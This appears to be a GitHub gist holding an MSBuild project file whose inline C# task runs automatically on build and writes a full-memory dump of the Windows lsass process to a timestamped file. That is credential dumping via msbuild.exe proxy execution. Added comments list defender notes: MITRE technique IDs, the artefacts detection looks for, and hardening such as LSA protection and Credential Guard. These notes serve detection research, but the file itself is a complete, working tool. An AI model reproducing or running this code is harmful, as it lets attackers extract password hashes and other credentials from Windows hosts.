@jackson5sec
Created February 22, 2018 22:15
MSBuild - Process Dumper - lsass example
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task compiles and executes the C# code below when the project is built. -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe MSBuildProcDumper.csproj -->
<!-- Feel free to use a more aggressive class for testing. -->
<Target Name="Hello">
<ClassExample />
</Target>
<UsingTask
TaskName="ClassExample"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<Task>
<!-- <Reference Include="System.IO" /> Example Include -->
<Code Type="Class" Language="cs">
<![CDATA[
using System;
using System.IO;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Security;
using System.Reflection;
using System.Runtime.Remoting;
using System.Threading;
using System.Globalization;
using Microsoft.Build.Framework;
using Microsoft.Build.Utilities;
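/// <summary>
/// MSBuild inline task that writes a full-memory minidump of the first process
/// named "lsass" to a timestamped file in the current working directory.
/// The class is compiled by CodeTaskFactory when the project is built.
/// </summary>
/// <remarks>
/// Defender notes. This listing combines two well-documented behaviours:
/// proxy execution through a trusted developer utility (MITRE ATT&amp;CK T1127.001)
/// and LSASS memory access for credential dumping (T1003.001).
/// Observable artefacts in this code: msbuild.exe building a project with an
/// inline CodeTaskFactory task, msbuild.exe loading dbghelp.dll, a process
/// handle opened on lsass.exe, and a "Dump&lt;timestamp&gt;.dmp" file created by
/// msbuild.exe. Relevant hardening: LSA protection (RunAsPPL), Credential
/// Guard, the attack surface reduction rule that blocks credential stealing
/// from lsass.exe, and application-control policy restricting msbuild.exe.
/// The resulting file holds credential material and must be handled as a secret.
/// </remarks>
public class ClassExample : Task, ITask
{
    /// <summary>Task entry point invoked by MSBuild for the "Hello" target.</summary>
    /// <returns>
    /// <c>true</c> when the dump was written; <c>false</c> otherwise, so the build
    /// reports the failure instead of always claiming success.
    /// </returns>
    public override bool Execute()
    {
        Console.WriteLine("Hello From MSBuildProcDump!");
        return TryCreateMiniDump();
    }

    /// <summary>
    /// Flag values passed as the DumpType argument of MiniDumpWriteDump; they mirror
    /// the MINIDUMP_TYPE enumeration declared in dbghelp.h.
    /// </summary>
    public static class MINIDUMPTYPE
    {
        public const int MiniDumpNormal = 0x00000000;
        public const int MiniDumpWithDataSegs = 0x00000001;
        public const int MiniDumpWithFullMemory = 0x00000002;
        public const int MiniDumpWithHandleData = 0x00000004;
        public const int MiniDumpFilterMemory = 0x00000008;
        public const int MiniDumpScanMemory = 0x00000010;
        public const int MiniDumpWithUnloadedModules = 0x00000020;
        public const int MiniDumpWithIndirectlyReferencedMemory = 0x00000040;
        public const int MiniDumpFilterModulePaths = 0x00000080;
        public const int MiniDumpWithProcessThreadData = 0x00000100;
        public const int MiniDumpWithPrivateReadWriteMemory = 0x00000200;
        public const int MiniDumpWithoutOptionalData = 0x00000400;
        public const int MiniDumpWithFullMemoryInfo = 0x00000800;
        public const int MiniDumpWithThreadInfo = 0x00001000;
        public const int MiniDumpWithCodeSegs = 0x00002000;
    }

    /// <summary>P/Invoke declaration for dbghelp.dll!MiniDumpWriteDump.</summary>
    /// <returns><c>true</c> on success; on failure the last-error value is set.</returns>
    // SetLastError is required so Marshal.GetLastWin32Error() returns this call's
    // error rather than a stale value from an earlier API call.
    [DllImport("dbghelp.dll", SetLastError = true)]
    public static extern bool MiniDumpWriteDump(
        IntPtr hProcess, Int32 ProcessId, IntPtr hFile, int DumpType,
        IntPtr ExceptionParam, IntPtr UserStreamParam, IntPtr CallackParam);

    /// <summary>
    /// Unhandled-exception callback that triggers a dump. Nothing in this listing
    /// subscribes it to AppDomain.UnhandledException, so it is never called here.
    /// </summary>
    private static void CurrentDomainUnhandledException(
        object sender, UnhandledExceptionEventArgs e)
    {
        CreateMiniDump();
    }

    /// <summary>
    /// Writes the dump and discards the outcome. Kept as a void method so existing
    /// callers are unaffected; failures are reported on the console.
    /// </summary>
    public static void CreateMiniDump()
    {
        TryCreateMiniDump();
    }

    /// <summary>
    /// Looks up the target process, creates the output file and calls MiniDumpWriteDump.
    /// </summary>
    /// <returns><c>true</c> when MiniDumpWriteDump reported success.</returns>
    private static bool TryCreateMiniDump()
    {
        Process[] candidates = Process.GetProcessesByName("lsass");
        try
        {
            // The original indexed element 0 unconditionally and threw
            // IndexOutOfRangeException when the lookup returned nothing.
            if (candidates.Length == 0)
            {
                Console.WriteLine("No process named lsass was found; no dump written.");
                return false;
            }

            Process process = candidates[0];
            Console.WriteLine(process.Id);

            string dt = DateTime.Now.ToString("yyyy.MM.dd.HH.mm.ss", DateTimeFormatInfo.InvariantInfo);
            string dumpFileName = "Dump" + dt + ".dmp";

            // The file is created only after the lookup succeeded, so a failed lookup
            // no longer leaves an empty .dmp behind. The using block releases the file
            // handle deterministically and keeps the stream alive while its raw handle
            // is in use by native code.
            using (FileStream fs = new FileStream(dumpFileName, FileMode.Create))
            {
                bool written = MiniDumpWriteDump(
                    process.Handle, process.Id,
                    fs.SafeFileHandle.DangerousGetHandle(),
                    MINIDUMPTYPE.MiniDumpWithFullMemory, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero);

                if (!written)
                {
                    // Must be read immediately after the P/Invoke call.
                    int error = Marshal.GetLastWin32Error();
                    Console.WriteLine("MiniDumpWriteDump failed, last error 0x" + error.ToString("X8", CultureInfo.InvariantCulture));
                }

                return written;
            }
        }
        finally
        {
            // Process objects wrap native handles; release all of them, not just the one used.
            foreach (Process candidate in candidates)
            {
                candidate.Dispose();
            }
        }
    }
}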
]]>
</Code>
</Task>
</UsingTask>
</Project>